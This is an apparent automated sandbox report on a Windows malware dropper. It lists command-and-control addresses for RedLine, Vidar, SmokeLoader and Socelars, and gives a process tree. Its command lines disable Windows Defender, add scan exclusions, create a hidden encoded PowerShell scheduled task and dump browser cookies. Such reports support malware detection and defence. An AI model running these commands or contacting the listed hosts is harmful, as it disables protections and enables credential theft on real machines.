Analysis

  • max time kernel
    59s
  • max time network
    172s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20/12/2021, 14:02

General

  • Target

    99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe

  • Size

    7.0MB

  • MD5

    27ee0fff858ebb65e9d645b3890418f9

  • SHA1

    78cce78871932c34b30a16296063ee1ca6c152e5

  • SHA256

    99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa

  • SHA512

    193f9dca9b3a7f26b7e0222d784e2f88f76743141c51917ba4dc4232ba1e2205b9fa53762c55926f53ea9c37670d121ab971e77ed0e33641db51ee355737ef05

Malware Config

Extracted

Family

socelars

C2

http://www.biohazardgraphics.com/

Extracted

Family

vidar

Version

49.1

Botnet

915

C2

https://noc.social/@sergeev46

https://c.im/@sergeev47

Attributes
  • profile_id

    915

Extracted

Family

smokeloader

Version

2020

C2

http://rcacademy.at/upload/

http://e-lanpengeonline.com/upload/

http://vjcmvz.cn/upload/

http://galala.ru/upload/

http://witra.ru/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

v3user1

C2

159.69.246.184:13127

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 5 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 33 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 5 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe
    "C:\Users\Admin\AppData\Local\Temp\99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3956
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1304
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3964
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun10467c5b95.exe
          4⤵
            PID:448
            • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10467c5b95.exe
              Sun10467c5b95.exe
              5⤵
              • Executes dropped EXE
              PID:1680
              • C:\Users\Admin\Pictures\Adobe Films\EXSNwvbiYOmfXKGKgs3Ku6Pi.exe
                "C:\Users\Admin\Pictures\Adobe Films\EXSNwvbiYOmfXKGKgs3Ku6Pi.exe"
                6⤵
                  PID:4800
                • C:\Users\Admin\Pictures\Adobe Films\q5I2dJJV6kK7x8RRCnHC1M9e.exe
                  "C:\Users\Admin\Pictures\Adobe Films\q5I2dJJV6kK7x8RRCnHC1M9e.exe"
                  6⤵
                    PID:2368
                  • C:\Users\Admin\Pictures\Adobe Films\0OppErD0bsEo_NalHxGugaq5.exe
                    "C:\Users\Admin\Pictures\Adobe Films\0OppErD0bsEo_NalHxGugaq5.exe"
                    6⤵
                      PID:2800
                      • C:\Users\Admin\AppData\Local\a876bd7a-f3c2-453b-86cd-ac22b22e468e.exe
                        "C:\Users\Admin\AppData\Local\a876bd7a-f3c2-453b-86cd-ac22b22e468e.exe"
                        7⤵
                          PID:5224
                        • C:\Users\Admin\AppData\Local\8f4f023a-1e19-4b03-8c88-6390a95e1642.exe
                          "C:\Users\Admin\AppData\Local\8f4f023a-1e19-4b03-8c88-6390a95e1642.exe"
                          7⤵
                            PID:2144
                          • C:\Users\Admin\AppData\Local\5c6c344d-d780-416b-bc74-d1aa11f14a27.exe
                            "C:\Users\Admin\AppData\Local\5c6c344d-d780-416b-bc74-d1aa11f14a27.exe"
                            7⤵
                              PID:4336
                          • C:\Users\Admin\Pictures\Adobe Films\PnthudFnJxDTaFR6hCSUQSRL.exe
                            "C:\Users\Admin\Pictures\Adobe Films\PnthudFnJxDTaFR6hCSUQSRL.exe"
                            6⤵
                              PID:1864
                              • C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe
                                "C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"
                                7⤵
                                  PID:5500
                                • C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                                  "C:\Users\Admin\AppData\Local\Temp\zhangting.exe"
                                  7⤵
                                    PID:5516
                                    • C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                                      "C:\Users\Admin\AppData\Local\Temp\zhangting.exe" -u
                                      8⤵
                                        PID:3988
                                    • C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"
                                      7⤵
                                        PID:4852
                                      • C:\Users\Admin\AppData\Local\Temp\inst.exe
                                        "C:\Users\Admin\AppData\Local\Temp\inst.exe"
                                        7⤵
                                          PID:4352
                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                          7⤵
                                            PID:4452
                                          • C:\Users\Admin\AppData\Local\Temp\setup1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup1.exe"
                                            7⤵
                                              PID:4612
                                            • C:\Users\Admin\AppData\Local\Temp\racoon.exe
                                              "C:\Users\Admin\AppData\Local\Temp\racoon.exe"
                                              7⤵
                                                PID:4928
                                              • C:\Users\Admin\AppData\Local\Temp\askhelp.exe
                                                "C:\Users\Admin\AppData\Local\Temp\askhelp.exe"
                                                7⤵
                                                  PID:4340
                                                • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                                                  7⤵
                                                    PID:5820
                                                  • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                    7⤵
                                                      PID:4652
                                                    • C:\Users\Admin\AppData\Local\Temp\logger.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\logger.exe"
                                                      7⤵
                                                        PID:3936
                                                      • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                        7⤵
                                                          PID:1588
                                                        • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                                                          7⤵
                                                            PID:6024
                                                          • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                            7⤵
                                                              PID:5280
                                                          • C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"
                                                            6⤵
                                                              PID:5192
                                                              • C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"
                                                                7⤵
                                                                  PID:5388
                                                              • C:\Users\Admin\Pictures\Adobe Films\4ePcItbOIFBNfJJYafOyxx5O.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\4ePcItbOIFBNfJJYafOyxx5O.exe"
                                                                6⤵
                                                                  PID:5176
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSB107.tmp\Install.exe
                                                                    .\Install.exe
                                                                    7⤵
                                                                      PID:3840
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSD326.tmp\Install.exe
                                                                        .\Install.exe /S /site_id "525403"
                                                                        8⤵
                                                                          PID:5792
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                            9⤵
                                                                              PID:5076
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                10⤵
                                                                                  PID:1152
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                    11⤵
                                                                                      PID:5456
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                  9⤵
                                                                                    PID:2412
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                      10⤵
                                                                                        PID:4456
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                      9⤵
                                                                                        PID:4636
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                          10⤵
                                                                                            PID:5864
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "gYpzmTZDv" /SC once /ST 00:56:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                          9⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:2196
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"
                                                                                    6⤵
                                                                                      PID:5356
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"
                                                                                        7⤵
                                                                                          PID:4404
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\0pLeABNB_2OGcWGTckrKLPxb.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\0pLeABNB_2OGcWGTckrKLPxb.exe"
                                                                                        6⤵
                                                                                          PID:5492
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            7⤵
                                                                                              PID:5684
                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              7⤵
                                                                                                PID:3664
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Gbj64GgjHOmgsLq9f2vD2Def.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Gbj64GgjHOmgsLq9f2vD2Def.exe"
                                                                                              6⤵
                                                                                                PID:5588
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\eeUsra3KO3F8pRjymnsB0nXP.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\eeUsra3KO3F8pRjymnsB0nXP.exe"
                                                                                                6⤵
                                                                                                  PID:5708
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\y6BrMPmK5ph61VVOpJvALchW.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\y6BrMPmK5ph61VVOpJvALchW.exe"
                                                                                                  6⤵
                                                                                                    PID:5348
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                      7⤵
                                                                                                        PID:5260
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                        7⤵
                                                                                                          PID:6180
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\sqwQeI1eYHHnuOLtHzZ2ML0_.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\sqwQeI1eYHHnuOLtHzZ2ML0_.exe"
                                                                                                        6⤵
                                                                                                          PID:5812
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\fK9g8eZ9t6yVzxfwet1amDUU.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\fK9g8eZ9t6yVzxfwet1amDUU.exe"
                                                                                                          6⤵
                                                                                                            PID:5880
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\2E100bKotanh9fLG2KBQfsFN.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\2E100bKotanh9fLG2KBQfsFN.exe"
                                                                                                            6⤵
                                                                                                              PID:5932
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                7⤵
                                                                                                                  PID:4192
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                    8⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:4948
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\HjLCibFOi2YJXX4_J1Ao_Lnc.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\HjLCibFOi2YJXX4_J1Ao_Lnc.exe"
                                                                                                                6⤵
                                                                                                                  PID:5872
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\1j_af0aQ1vhAfBBQxi9h3oZE.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\1j_af0aQ1vhAfBBQxi9h3oZE.exe"
                                                                                                                  6⤵
                                                                                                                    PID:5144
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\CEzFZCZOex2S8chk5mYyOsMe.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\CEzFZCZOex2S8chk5mYyOsMe.exe"
                                                                                                                    6⤵
                                                                                                                      PID:4788
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\3pyvDF5BcyhBADQASRHdE_kU.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\3pyvDF5BcyhBADQASRHdE_kU.exe"
                                                                                                                      6⤵
                                                                                                                        PID:3576
                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                                                                                          7⤵
                                                                                                                            PID:5740
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\gJvKZNOeZzxVnAeqDvQvn9WO.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\gJvKZNOeZzxVnAeqDvQvn9WO.exe"
                                                                                                                          6⤵
                                                                                                                            PID:3168
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\2DYQvtIh3ce8724on5V09oIc.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\2DYQvtIh3ce8724on5V09oIc.exe"
                                                                                                                            6⤵
                                                                                                                              PID:740
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Vkki9EWhRfFG3swXd2uwRJKl.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Vkki9EWhRfFG3swXd2uwRJKl.exe"
                                                                                                                              6⤵
                                                                                                                                PID:2220
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:1168
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\q7eIVhHVwNzS8Z03T3qBYNfn.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\q7eIVhHVwNzS8Z03T3qBYNfn.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:644
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\nGGzH035fd28Rex9K2YjI1D8.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\nGGzH035fd28Rex9K2YjI1D8.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:5048
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\6VKDl7znAfYnyGKVQb1ZkqIH.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\6VKDl7znAfYnyGKVQb1ZkqIH.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:3248
                                                                                                                                        • C:\Users\Admin\Documents\uIrgCCwCkXNkltWaSsazxtRg.exe
                                                                                                                                          "C:\Users\Admin\Documents\uIrgCCwCkXNkltWaSsazxtRg.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:6148
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                            7⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:6200
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                            7⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:6192
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\i0K_H6Cs2RJCTWPiOUYD37pl.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\i0K_H6Cs2RJCTWPiOUYD37pl.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:2400
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\vH3tKOl06Wfs5SENTRp7envA.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\vH3tKOl06Wfs5SENTRp7envA.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:5720
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\kFJFPA7cj6Dr2QL7L7i0pE1P.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\kFJFPA7cj6Dr2QL7L7i0pE1P.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:2512
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:3988
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe" -u
                                                                                                                                                    7⤵
                                                                                                                                                      PID:920
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:1320
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe" -u
                                                                                                                                                        7⤵
                                                                                                                                                          PID:2092
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun108e4051ef0.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:784
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun108e4051ef0.exe
                                                                                                                                                      Sun108e4051ef0.exe
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:3708
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun10d73b7785b.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:1712
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10d73b7785b.exe
                                                                                                                                                      Sun10d73b7785b.exe
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:628
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im Sun10d73b7785b.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10d73b7785b.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                        6⤵
                                                                                                                                                          PID:4600
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /im Sun10d73b7785b.exe /f
                                                                                                                                                            7⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:4752
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sun1074b86ebb831862.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:2876
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1074b86ebb831862.exe
                                                                                                                                                        Sun1074b86ebb831862.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3700
                                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                                          "C:\Windows\System32\control.exe" .\2c3M8M5c.RJ
                                                                                                                                                          6⤵
                                                                                                                                                            PID:3052
                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:1064
                                                                                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:5992
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\2c3M8M5c.RJ
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:2456
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c Sun1050791613c996ff.exe
                                                                                                                                                            4⤵
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:4080
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c Sun10aa9ae1c57b995f.exe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3376
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exe
                                                                                                                                                                Sun10aa9ae1c57b995f.exe
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
